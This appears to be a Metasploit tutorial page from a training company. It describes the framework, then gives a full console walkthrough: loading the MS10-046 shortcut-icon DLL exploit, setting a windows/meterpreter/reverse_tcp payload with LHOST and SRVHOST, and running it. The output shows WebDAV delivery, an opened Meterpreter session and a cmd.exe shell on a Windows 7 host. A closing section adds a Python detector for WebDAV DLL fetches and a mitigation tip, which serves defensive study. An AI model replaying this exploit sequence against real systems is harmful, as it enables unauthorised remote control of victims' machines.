metasploit community / pro

Description

The Metasploit Framework (MSF) is a collection of programs and tools for penetration testing networks. Metasploit provides exploits, payloads, libraries and interfaces that can be used to exploit computers.

Metasploit has a large collection of exploits and payloads, together with the tools to package and deliver them to a targeted host. Metasploit lets you choose an exploit from its library, choose a payload, configure the target address, the target port numbers and other options; the framework then packages it all together and launches it across the network at the targeted system. Metasploit is extremely flexible and can assist in the testing and development of exploits. Written in the Ruby programming language, Metasploit also allows users to write their own exploits and payloads and include them within the framework. Metasploit is cross-platform: it runs on Linux, Mac OS and Windows, and has exploits and payloads targeting all three as well.

Meterpreter – One of the more powerful payloads is the Metasploit Interpreter, or Meterpreter. Meterpreter gives the user command-line access to the targeted machine without running a cmd.exe process; it runs completely in memory inside the exploited process.

Example

Reverse connection from a target running Windows 7:

cyborg@cyborg:~$ sudo msfpro
[sudo] password for cyborg: 
[*] Starting Metasploit Console...

 _                                                    _
/ \    /\         __                         _   __  /_/ __
| |\  / | _____   \ \           ___   _____ | | /  \ _   \ \
| | \/| | | ___\ |- -|   /\    / __\ | -__/ | || | || | |- -|
|_|   | | | _|__  | |_  / -\ __\ \   | |    | | \__/| |  | |_
      |/  |____/  \___\/ /\ \\___/   \/     \__|    |_\  \___\


Love leveraging credentials? Check out bruteforcing
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.10.0-2014082003 [core:4.10.0.pre.2014082003 api:1.0.0]]
+ -- --=[ 1339 exploits - 809 auxiliary - 228 post        ]
+ -- --=[ 340 payloads - 35 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Successfully loaded plugin: pro
msf > show exploits

Exploits
========

   Name                                                           Disclosure Date  Rank       Description
   ----                                                           ---------------  ----       -----------
   aix/local/ibstat_path                                          2013-09-24       excellent  ibstat $PATH Privilege Escalation
   aix/rpc_cmsd_opcode21                                          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
   aix/rpc_ttdbserverd_realpath                                   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
   android/browser/webview_addjavascriptinterface                 2012-12-21       normal     Android Browser and WebView addJavascriptInterface Code Execution
   android/fileformat/adobe_reader_pdf_js_interface               2014-04-13       good       Adobe Reader for Android addJavascriptInterface Exploit
   apple_ios/browser/safari_libtiff                               2006-08-01       good       Apple iOS MobileSafari LibTIFF Buffer Overflow
   apple_ios/email/mobilemail_libtiff                             2006-08-01       good       Apple iOS MobileMail LibTIFF Buffer Overflow
   apple_ios/ssh/cydia_default_ssh                                2007-07-02       excellent  Apple iOS Default SSH Password Vulnerability
   bsdi/softcart/mercantec_softcart                               2004-08-19       great      Mercantec SoftCart CGI Overflow
   dialup/multi/login/manyargs                                    2001-12-12       good       System V Derived /bin/login Extraneous Arguments Buffer Overflow
   firefox/local/exec_shellcode                                   2014-03-10       normal     Firefox Exec Shellcode from Privileged Javascript Shell
   freebsd/ftp/proftp_telnet_iac                                  2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   freebsd/local/mmap                                             2013-06-18       great      FreeBSD 9 Address Space Manipulation Privilege Escalation
   freebsd/samba/trans2open                                       2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   freebsd/tacacs/xtacacsd_report                                 2008-01-08       average    XTACACSD report() Buffer Overflow
   freebsd/telnet/telnet_encrypt_keyid                            2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer 
.............
msf > use windows/browser/ms10_046_shortcut_icon_dllloader


msf exploit(ms10_046_shortcut_icon_dllloader) > show payloads

Compatible Payloads
===================

   Name                                             Disclosure Date  Rank    Description
   ----                                             ---------------  ----    -----------
   generic/custom                                                    normal  Custom Payload
   generic/debug_trap                                                normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                                            normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                                         normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                                                normal  Generic x86 Tight Loop
   windows/dllinject/bind_ipv6_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (IPv6)
   windows/dllinject/bind_nonx_tcp                                   normal  Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
   windows/dllinject/bind_tcp                                        normal  Reflective DLL Injection, Bind TCP Stager
   windows/dllinject/bind_tcp_rc4                                    normal  Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_hop_http                                normal  Reflective DLL Injection, Reverse Hop HTTP Stager
   windows/dllinject/reverse_http                                    normal  Reflective DLL Injection, Reverse HTTP Stager
   windows/dllinject/reverse_ipv6_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (IPv6)
   windows/dllinject/reverse_nonx_tcp                                normal  Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp                                 normal  Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/dllinject/reverse_tcp                                     normal  Reflective DLL Injection, Reverse TCP Stager
   windows/dllinject/reverse_tcp_allports                            normal  Reflective DLL Injection, Reverse All-Port TCP Stager
   windows/dllinject/reverse_tcp_dns                                 normal  Reflective DLL Injection, Reverse TCP Stager (DNS)
   windows/dllinject/reverse_tcp_rc4                                 normal  Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption)
   windows/dllinject/reverse_tcp_rc4_dns                             normal  Reflective DLL Injection, Reverse TCP Stage

..................................
msf exploit(ms10_046_shortcut_icon_dllloader) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_046_shortcut_icon_dllloader) > set LHOST 192.168.1.10
LHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > show options

Module options (exploit/windows/browser/ms10_046_shortcut_icon_dllloader):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   UNCHOST                   no        The host portion of the UNC path to provide to clients (ex: 1.2.3.4).
   URIPATH  /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: seh, thread, process, none)
   LHOST     192.168.1.10     yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(ms10_046_shortcut_icon_dllloader) > set SRVHOST 192.168.1.10
SRVHOST => 192.168.1.10
msf exploit(ms10_046_shortcut_icon_dllloader) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.10:4444 
msf exploit(ms10_046_shortcut_icon_dllloader) > [*] Send vulnerable clients to \\192.168.1.10\nlyZM\.
[*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
[*] Using URL: http://192.168.1.10:80/
[*] Server started.
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending UNC redirect
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Responding to WebDAV OPTIONS request
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 404 for /nlyZM/dEgPpgDCjZL.dll.2.Manifest ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending 301 for /nlyZM ...
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending directory multistatus for /nlyZM/ ...
[*] Sending stage (769536 bytes) to 192.168.1.40
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Received WebDAV PROPFIND request for /nlyZM/dEgPpgDCjZL.dll
[*] 192.168.1.40     ms10_046_shortcut_icon_dllloader - Sending DLL multistatus for /nlyZM/dEgPpgDCjZL.dll ...
[*] Meterpreter session 1 opened (192.168.1.10:4444 -> 192.168.1.40:52843) at 2015-10-09 16:42:57 +0530

msf exploit(ms10_046_shortcut_icon_dllloader) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -i -H
Process 4036 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>ipconfig
ipconfig

Windows IP Configuration


Ethernet adapter Local Area Connection:

   Connection-specific DNS Suffix  . : 
   Link-local IPv6 Address . . . . . : fe80::310c:8439:5772:51c8%11
   IPv4 Address. . . . . . . . . . . : 192.168.1.40
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::226:15ff:fe67:e6c3%11
                                       192.168.1.1
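From the defender's side, the exchange logged above by the exploit module is visible in the target's outbound HTTP traffic: a workstation speaking WebDAV (OPTIONS, PROPFIND) to an unfamiliar host and then requesting a .dll from that share. The following script is an added example, not code from the page or from Metasploit; it runs that detection over constructed proxy-style log lines whose request sequence mirrors the session above (the log format, the client addresses 192.168.1.41/42 and the host files.corp.example are assumptions).

```python
import re
from collections import defaultdict

# Constructed proxy-style log lines (not taken from the page): one request per
# line as "<client> <method> <host> <path> <status>". Client 192.168.1.40
# replays the WebDAV sequence from the console output above; the other two
# clients are benign noise (a trusted WebDAV share and a plain GET).
SAMPLE_LOG = """\
192.168.1.40 GET 192.168.1.10 / 200
192.168.1.40 OPTIONS 192.168.1.10 / 200
192.168.1.40 PROPFIND 192.168.1.10 /nlyZM 301
192.168.1.40 PROPFIND 192.168.1.10 /nlyZM/ 207
192.168.1.40 PROPFIND 192.168.1.10 /nlyZM/dEgPpgDCjZL.dll 207
192.168.1.41 PROPFIND files.corp.example /shared/report.docx 207
192.168.1.42 GET 192.168.1.10 /index.html 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3})$")
WEBDAV_METHODS = {"OPTIONS", "PROPFIND"}


def parse(log_text):
    """Yield (client, method, host, path, status) tuples; skip malformed lines."""
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group(1), m.group(2), m.group(3), m.group(4), int(m.group(5))


def find_webdav_dll_fetches(log_text, trusted_hosts=frozenset()):
    """Return {client: [(host, path), ...]} for every WebDAV request for a .dll
    sent to a host that is not an approved WebDAV share. A workstation pulling a
    DLL over WebDAV from an unknown host is the signature of the shortcut-icon
    DLL load shown in the session above, whatever the share name happens to be."""
    hits = defaultdict(list)
    for client, method, host, path, _status in parse(log_text):
        if host in trusted_hosts or method not in WEBDAV_METHODS:
            continue
        if path.lower().endswith(".dll"):
            hits[client].append((host, path))
    return dict(hits)


if __name__ == "__main__":
    for client, fetches in find_webdav_dll_fetches(SAMPLE_LOG, {"files.corp.example"}).items():
        print(f"{client}: WebDAV DLL fetch {fetches}")
```

Restricting outbound WebDAV from workstations to approved shares (or disabling the WebClient service where it is not needed) removes the delivery path this detection watches for.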
©2017 Ztrela Knowledge Solutions Pvt. Ltd